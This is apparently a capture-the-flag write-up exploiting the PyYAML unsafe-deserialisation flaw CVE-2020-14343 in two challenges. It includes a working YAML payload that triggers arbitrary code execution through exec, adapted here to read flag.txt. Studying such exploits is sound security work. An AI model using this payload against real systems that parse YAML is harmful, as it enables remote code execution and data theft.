Challenge Checker

PyYAML deserialisation vulnerability (CVE-2020-14343).

Challenge Checker 1

We are prompted to paste in YAML data. We can see from the code that yaml.load() is used to load the data.

from yaml import load

...

def check(raw_data) -> "Tuple[list[str], list[str]]":
    data = load(raw_data)

There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.

Issue: https://github.com/yaml/pyyaml/issues/420 GitHub Advisory (CVE-2020-14343): https://github.com/advisories/GHSA-8q59-q68h-6hv4

We can see from requirements.txt that the version is 3.13, which is vulnerable.

PyYAML==3.13
termcolor==1.1.0

From the GitHub issue, we can find some of the proof of concept exploits. For instance:

- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

So, in the chall.yaml, I simply added this PoC under authors:

authors:
  - anli
  - Edward Feng
  - !!python/object/new:str
    args: []
    state: !!python/tuple
    - "print(open('flag.txt').read())"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
visible: true

This executes print(open('flag.txt').read()) and reads the flag.

Challenge Checker 2

The only change is that PyYAML is now version 5.3.1.

PyYAML==5.3.1
termcolor==1.1.0

But the exploit we used previously affected all versions below 5.4.1, so it works here too.

Last updated